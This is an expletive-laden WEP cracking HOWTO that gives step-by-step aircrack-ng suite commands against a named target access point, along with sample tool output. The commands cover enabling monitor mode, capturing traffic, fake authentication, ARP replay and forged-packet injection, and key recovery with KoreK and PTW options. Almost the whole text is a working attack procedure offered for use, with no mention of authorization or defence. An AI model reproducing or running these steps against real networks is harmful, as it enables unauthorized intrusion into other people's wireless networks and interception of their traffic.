WEP Cracking HOWTO
by asbesto && lechuck
I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin'document that state to explain how to crack a fracking WEP, really don't explain a SINGLE FUCK, linking other manual pages, making unuseful and unexplained examples also linking other incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT.
Thanks to Lechuck, without him this work will not be ever possible
So, this is an HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW.
What to install
Obviously you need the aircrack suite, now called aircrack-ng only because the old aircrack is no more developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers have renamed it instead of GIVING AN ACTUAL FUCK and call the new project exactly as the old one!
So:
sudo apt-get install aircrack-ng
Setup your newtork card
Assumint that your wifi card is wlan0, just use
airmon-ng start wlan0 1
so you have just activated the mon0 interface. Sometime you will get some warning messages about some daemons interfering and creating problems, shit like avahi, networkmanager, and other unuseful shit. KILL THEM ALL. You don't need to re-run airmon-ng.
Facts
Assuming the WEP AP to crack is called Diolink-22334455 with a MAC address (bssid) AP:AP:AP:AP:AP:AP
And my wlan0 address is: IO:IO:IO:IO:IO:IO
FIRST: let's dump some data
airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0
SECOND: aireplay #1
Open another shell:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You will get something like
16:55:37 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 16:55:37 Sending Authentication Request (Open System) 16:55:37 Authentication successful 16:55:37 Sending Association Request 16:55:37 Association successful :-) (AID: 1) root@lem:~#
FUCKING GOOD, it means you can autenticate. Now launch
aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
U get something like
16:57:27 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 Saving ARP requests in replay_arp-0629-165727.cap You should also start airodump-ng to capture replies. Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Packet number begin to raise. 0 arp is BAD. so let's move on the third phase.
THIRD: another aireplay
Open a third shell, we can try to autenticate, while the 2 other shells are running:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
If this create some ARP, well, that's GREAT! if this create only ACK, they're not useful so fuck them all. Again on the third shell, we can try
aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
This is aireplay interactive mode: it forge packets to DO SHIT. In theory, you must say Y to the forged packet only if it's lenght is 68 or 86. He read the packets, reflect, does some magic and create.
68 = lenght of a wifi client ARP. 86 for wired.
BUT I DON'T GIVE A FUCK, he gave me a 76, and I SAY FUCK YES!
after a while, I try
aircrack-ng filename.dump
And here they are, 76000 IV !!!!! LET'S START THE CRACKING PARTY!
He's pumping behind! He see the file still increasing, when a "failed" come out, he simply restart...
IS DONE. JUST A MATTER OF TIME.
THE BIG DEAL
aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap
-s show ascii. -K is useful, playing with f you can crack 100%.
with -f 4 I found the key.
-b must be specified, if not, BAD SHIT HAPPENS.
Scratchpad
aircrack-ng -K file.dump o file.ivs -k is a cracking algorithm: -k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. -y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs. -z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack. On some cases (AKA al**ce adsl :) you want to use -z (sometime you can't crack it with >1 millions IV - that's because default algo fails) [lobo]